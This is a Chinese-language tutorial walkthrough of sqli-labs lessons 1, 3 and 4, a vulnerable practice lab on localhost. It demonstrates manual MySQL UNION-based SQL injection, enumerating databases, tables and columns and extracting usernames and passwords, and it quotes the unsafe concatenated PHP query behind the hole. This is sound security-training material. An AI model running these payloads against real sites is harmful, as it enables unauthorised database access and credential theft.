sqli-labs ---- Less-1 & Less-3 & Less-4

[地址]: https://github.com/Audi-1/sqli-labs

mysql手工注入

基于单引号的显错注入，在开始之前，复习一下mysql手动注入的知识。

访问地址http://127.0.0.1/sqli-labs/Less-1/?id=1'，

提示"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1"。



UNION注入流程:

获取注入句型
http://127.0.0.1/sqli-labs/Less-1/?id=1'--+
猜解列数
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 5--+

Unknown column '5' in 'order clause'
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,3--+

获取当前数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+

获取数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+

获取表名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+

获取列名
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+

获取数据
http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

猜解查询语句

接下来讨论今天的主体内容。利用显错信息，猜解查询语句.
http://127.0.0.1/sqli-labs/Less-1/?id=\ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 0,1' at line 1

此处的\被不对称的单引号引用。\的作用是转义，主要用于判断输入是否被单个引号(单引号，或双引号)引用。上述结果证明输入被单引号包含。
http://127.0.0.1/sqli-labs/Less-1/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

此处的1，被两个单引号引用。
http://127.0.0.1/sqli-labs/Less-1/?id=1'2
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' LIMIT 0,1' at line 1

此处的2，被一个单引号引用。

配合LIMIT 0,1' 处的错误信息，我们可以猜测查询语句的句型，大概是:
select * from table_name where id='$id' limit 0,1;

打开对应的源文件，信息如下:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

注： Less-3 与 Less-4 可采用同样的方法，故在此省略.

最后推荐大家看篇帖子: http://stackoverflow.com/questions/5741187/sql-injection-that-gets-around-mysql-real-escape-string112